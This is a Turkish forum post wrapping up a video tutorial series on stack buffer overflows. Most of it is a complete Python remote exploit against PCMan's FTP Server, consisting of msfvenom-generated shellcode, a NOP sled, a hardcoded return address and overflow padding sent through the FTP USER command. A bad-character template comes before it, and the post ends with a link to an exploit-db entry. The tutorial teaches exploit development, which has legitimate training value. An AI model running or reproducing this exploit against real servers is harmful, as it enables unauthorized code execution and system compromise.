1.                        

Buffer Overflow Olayını Anlama-3-4-5-6

'Video' forumunda tababa86 tarafından 4 Mart 2017 tarihinde açılan konu

  1. tababa86

    tababa86 Albay

    Katılım:
    12 Mart 2016
    Mesaj:
    919
    Beğeniler:
    116
    Ödül Puanları:
    43
    Cinsiyet:
    Erkek
    Şehir:
    Kore
    Buffer Overflow Olayını Anlama-3


    Buffer Overflow Olayını Anlama-4-5



    Buffer Overflow Olayını Anlama-6



    Bu videolu-egitim anlatımında "jmp esp","badchar'ları bulma","shell kodu olusturma" konulu geri kalan 4 videoyu paylaştım.Badchar şablonu taratsanız google da bulursunuz ben buradan paylaşacam yinede.Ayrıca shell kodumu da paylaşacam fakat sizinki farklıdır.Bu benim bilgisayarım için çalısır sizin kendi shell kodunu olusturmanız gerekir onuda son videoda anlattım.

    shell kodu olusturma

    onu da msfvenom aracı ile yapacaz ...

    sonra kodumuzun çalısmasını engelleyen badcharları çıkarıp son

    halini python kodumuza ekleyip işletim sistemine girmeye çalısacaz....

    Kod:
    badchar = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
    
    +"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    
    +"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
    
    +"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    
    +"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
    
    +"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    
    +"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
    
    +"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    
    +"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
    
    +"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    
    +"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
    
    +"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    
    +"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
    
    +"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    
    +"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
    
    +"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
    badchar şablonudur...\x00 başta yazmadık zaten çoğu program için badchardır...

    exploit kodu...
    Kod:
    # basit Fuzzer PCMan's FTP Server
    #buffer overflow icin kodlar...
    import sys, socket, time   #modulleri gir....
    # python da yazilmis fuzz...
    host = raw_input('ip adresi :') #   server ipsi
    port = int(21) # nmap taramasinda 21. portu kullaniyor...
    
    #badchar "\x00\x0a\x0d"
    buf =  ""
    buf += "\xda\xc4\xd9\x74\x24\xf4\xbf\xd9\xae\x1e\x8a\x5d\x2b"
    buf += "\xc9\xb1\x52\x31\x7d\x17\x03\x7d\x17\x83\x34\x52\xfc"
    buf += "\x7f\x3a\x43\x83\x80\xc2\x94\xe4\x09\x27\xa5\x24\x6d"
    buf += "\x2c\x96\x94\xe5\x60\x1b\x5e\xab\x90\xa8\x12\x64\x97"
    buf += "\x19\x98\x52\x96\x9a\xb1\xa7\xb9\x18\xc8\xfb\x19\x20"
    buf += "\x03\x0e\x58\x65\x7e\xe3\x08\x3e\xf4\x56\xbc\x4b\x40"
    buf += "\x6b\x37\x07\x44\xeb\xa4\xd0\x67\xda\x7b\x6a\x3e\xfc"
    buf += "\x7a\xbf\x4a\xb5\x64\xdc\x77\x0f\x1f\x16\x03\x8e\xc9"
    buf += "\x66\xec\x3d\x34\x47\x1f\x3f\x71\x60\xc0\x4a\x8b\x92"
    buf += "\x7d\x4d\x48\xe8\x59\xd8\x4a\x4a\x29\x7a\xb6\x6a\xfe"
    buf += "\x1d\x3d\x60\x4b\x69\x19\x65\x4a\xbe\x12\x91\xc7\x41"
    buf += "\xf4\x13\x93\x65\xd0\x78\x47\x07\x41\x25\x26\x38\x91"
    buf += "\x86\x97\x9c\xda\x2b\xc3\xac\x81\x23\x20\x9d\x39\xb4"
    buf += "\x2e\x96\x4a\x86\xf1\x0c\xc4\xaa\x7a\x8b\x13\xcc\x50"
    buf += "\x6b\x8b\x33\x5b\x8c\x82\xf7\x0f\xdc\xbc\xde\x2f\xb7"
    buf += "\x3c\xde\xe5\x18\x6c\x70\x56\xd9\xdc\x30\x06\xb1\x36"
    buf += "\xbf\x79\xa1\x39\x15\x12\x48\xc0\xfe\x17\x8d\xc8\xe8"
    buf += "\x4f\x8f\xcc\x05\xcc\x06\x2a\x4f\xfc\x4e\xe5\xf8\x65"
    buf += "\xcb\x7d\x98\x6a\xc1\xf8\x9a\xe1\xe6\xfd\x55\x02\x82"
    buf += "\xed\x02\xe2\xd9\x4f\x84\xfd\xf7\xe7\x4a\x6f\x9c\xf7"
    buf += "\x05\x8c\x0b\xa0\x42\x62\x42\x24\x7f\xdd\xfc\x5a\x82"
    buf += "\xbb\xc7\xde\x59\x78\xc9\xdf\x2c\xc4\xed\xcf\xe8\xc5"
    buf += "\xa9\xbb\xa4\x93\x67\x15\x03\x4a\xc6\xcf\xdd\x21\x80"
    buf += "\x87\x98\x09\x13\xd1\xa4\x47\xe5\x3d\x14\x3e\xb0\x42"
    buf += "\x99\xd6\x34\x3b\xc7\x46\xba\x96\x43\x76\xf1\xba\xe2"
    buf += "\x1f\x5c\x2f\xb7\x7d\x5f\x9a\xf4\x7b\xdc\x2e\x85\x7f"
    buf += "\xfc\x5b\x80\xc4\xba\xb0\xf8\x55\x2f\xb6\xaf\x56\x7a"
    
    nop="\x90"*20   
    
    ret="\x24\xF4\xB3\x7C"
    length = "A"*2006+ret+nop+buf
    
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #  TCP socket
    client.connect((host, port)) # port,ip
    client.recv(1024) #  FTP Banner al
    client.send("USER " +length) # A
    client.recv(1024) # Recieve Reply
    client.send("gecen gecti") # tam baglantida gecen ...
    client.recv(1024) # tekrar al
    client.close() # baglantiyi kapa
    time.sleep(2) # dos atagina karsi uyumayi engelle
    print "Length Sent: " + str(length) # kuldan servere yollanan uzunluk
    
    #https://www.exploit-db.com/exploits/26471/
    en son halidir...Böylece 6 videolu egitimimiz bitmiştir.Umarım işinize yarar bilgiler bulursunuz.
     

Bu Sayfayı Paylaş

Share